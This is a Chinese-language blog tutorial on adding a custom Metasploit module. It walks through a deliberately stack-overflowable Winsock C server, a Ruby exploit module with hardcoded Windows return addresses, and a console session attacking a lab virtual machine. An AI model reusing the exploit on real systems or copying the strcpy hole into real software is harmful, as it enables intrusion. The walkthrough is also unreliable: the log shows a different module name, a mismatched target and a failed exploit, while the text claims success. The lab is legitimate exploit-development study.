简单测试使用msf发布poc

看个存在漏洞的代码

#include <IOSTREAM.H>
#include <WINSOCK2.H>
#pragma comment(lib,"ws2_32.lib")
VOID msg_display(char *buf)
{
	char msg[200];
	strcpy(msg,buf);
	cout<<"****************"<<endl;
	cout<<msg<<endl;
}

void main()
{
	SOCKET sock,msgsock,length,receive_len;
	struct sockaddr_in sock_server,sock_client;
	char buf[0x200];

	WSADATA wsa;
	WSAStartup(MAKEWORD(1,1),&wsa);
	if ((sock=socket(AF_INET,SOCK_STREAM,0))<0)
	{
		cout<<sock<<"Socket Creating Error!"<<endl;
		exit(1);
	}

	sock_server.sin_family=AF_INET;
	sock_server.sin_port=htons(7777);
	sock_server.sin_addr.S_un.S_addr=INADDR_ANY;
	if (bind(sock,(sockaddr *)&sock_server,sizeof(sock_server)))
	{
		cout<<"binging stream socket error!"<<endl;
	}
	cout<<"**********************************"<<endl;
	cout<<"   exploit target server 1.0      "<<endl;
	cout<<"**********************************"<<endl;
	listen(sock,4);
	length=sizeof(struct sockaddr);
	do 
	{
		msgsock=accept(sock,(struct sockaddr *)&sock_client,(int *)&length);
		if (msgsock==1)
		{
			cout<<"accept error!"<<endl;
			break;
		}
		else
			do
			{
				memset(buf,0,sizeof(buf));
				if ((receive_len=recv(msgsock,buf,sizeof(buf),0))<0)
				{
					cout<<"reading stream message error!"<<endl;
					receive_len=0;
				}
				msg_display(buf);
			}while(receive_len);
			closesocket(msgsock);
	} while (1);
	WSACleanup();
}

msg_display中存在栈溢出，服务器测试环境windows2000 server虚拟机，让其运行监听7777端口。

看一个ruby脚本

#!/usr/bin/env ruby
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
include Exploit::Remote::Tcp

	def initialize(info = {})
		super(update_info(info,
			'Name'          => 'Evil0r_POC',
			'Version'       => '1.0',
			'Platform'	=> 'win',
			'Privileged'	=> true,
			'License'       => MSF_LICENSE,
			'Author'        => 'Evil0r',
			'Targets'       => [				
						['Windows 2000',  {'Ret' => [200 , 0x77F8948B] }],
						['Windows XP SP2',{'Ret' => [200 , 0x7C914393] }],						
					    ],
			'DefaultTarget' => 0,
							
			'Payload'       => {
						'Space'    => 200,
						'BadChars' => "\x00",
						'StackAdjustment' => -3500,
					    },	
			'Description'    => %q{
						this module is exploit practice of book
						"Vulnerability Exploit and Analysis Technique"
						used only for educational purpose
						},
			'Arch'           => 'x86',
			'References'     => [
                            			[ 'URL', 'http://blog.csdn.net/evi10r' ],
                            			[ 'CVE', '44444' ],
                               		    ],
			'DefaultOptions' => { 'EXITFUNC' => 'process' }                      
                     ))
	end #end of initialize

	def exploit
		connect
		print_status("Sending #{payload.encoded.length} byte payload...")
		buf = 'a'*target['Ret'][0]
		buf << [target['Ret'][1]].pack('V')
		buf <<payload.encoded;
		sock.put(buf)	
		handler
		disconnect
	end  #end of exploit def
end

将Evil0r_Poc.rb放到exploits目录下（新建一个文件夹），然后打开exploits console，show exploits就可以看到我们自己添加的模块了。

可以info看下信息

msf > info Evil0r/Evil0r_Poc


       Name: Evil0r_POC
    Version: 1.0
   Platform: Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Normal


Provided by:
  Evil0r


Available targets:
  Id  Name
  --  ----
  0   Windows 2000
  1   Windows XP SP2


Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST                   yes       The target address
  RPORT                   yes       The target port


Payload information:
  Space: 200
  Avoid: 1 characters


Description:
  this module is exploit practice of book "Vulnerability Exploit and 
  Analysis Technique" used only for educational purpose


References:
  http://blog.csdn.net/evi10r
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=44444

现在我们拿它来对windows2000server虚拟机进行攻击测试。

msf > use failwest/est
[-] Failed to load module: failwest/est
msf > use failwest/test
msf exploit(test) > show targets


Exploit targets:


   Id  Name
   --  ----
   0   Windows 2000
   1   Windows XP SP3




msf exploit(test) > set target 0
target => 0
msf exploit(test) > show payloads


Compatible Payloads
===================


   Name                                         Rank    Description
   ----                                         ----    -----------
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop
   windows/dllinject/reverse_nonx_tcp           normal  Reflective Dll Injection, Reverse TCP Stager (No NX or Win7)
   windows/dllinject/reverse_ord_tcp            normal  Reflective Dll Injection, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/exec                                 normal  Windows Execute Command
   windows/meterpreter/reverse_nonx_tcp         normal  Windows Meterpreter (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/meterpreter/reverse_ord_tcp          normal  Windows Meterpreter (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/metsvc_bind_tcp                      normal  Windows Meterpreter Service, Bind TCP
   windows/metsvc_reverse_tcp                   normal  Windows Meterpreter Service, Reverse TCP Inline
   windows/patchupdllinject/reverse_nonx_tcp    normal  Windows Inject DLL, Reverse TCP Stager (No NX or Win7)
   windows/patchupdllinject/reverse_ord_tcp     normal  Windows Inject DLL, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_nonx_tcp  normal  Windows Meterpreter (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupmeterpreter/reverse_ord_tcp   normal  Windows Meterpreter (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/patchupvncinject/reverse_nonx_tcp    normal  Windows VNC Inject (skape/jt injection), Reverse TCP Stager (No NX or Win7)
   windows/patchupvncinject/reverse_ord_tcp     normal  Windows VNC Inject (skape/jt injection), Reverse Ordinal TCP Stager (No NX or Win7)
   windows/shell/reverse_nonx_tcp               normal  Windows Command Shell, Reverse TCP Stager (No NX or Win7)
   windows/shell/reverse_ord_tcp                normal  Windows Command Shell, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/upexec/reverse_nonx_tcp              normal  Windows Upload/Execute, Reverse TCP Stager (No NX or Win7)
   windows/upexec/reverse_ord_tcp               normal  Windows Upload/Execute, Reverse Ordinal TCP Stager (No NX or Win7)
   windows/vncinject/reverse_nonx_tcp           normal  VNC Server (Reflective Injection), Reverse TCP Stager (No NX or Win7)
   windows/vncinject/reverse_ord_tcp            normal  VNC Server (Reflective Injection), Reverse Ordinal TCP Stager (No NX or Win7)


msf exploit(test) > set payload windows/exec
payload => windows/exec
msf exploit(test) > show options


Module options:


   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT                   yes       The target port




Payload options (windows/exec):


   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CMD                        yes       The command string to execute
   EXITFUNC  process          yes       Exit technique: seh, thread, process




Exploit target:


   Id  Name
   --  ----
   0   Windows 2000




msf exploit(test) > set rhost 192.168.79.132
rhost => 192.168.79.132
msf exploit(test) > set rport 7777
rport => 7777
msf exploit(test) > set cmd calc
cmd => calc
msf exploit(test) > set exitfunc seh
exitfunc => seh
msf exploit(test) > exploit


[-] Exploit failed: No encoders encoded the buffer successfully.
[*] Exploit completed, but no session was created.

然后看到我们的2000虚拟机弹出计算器窗口了，shellcode成功执行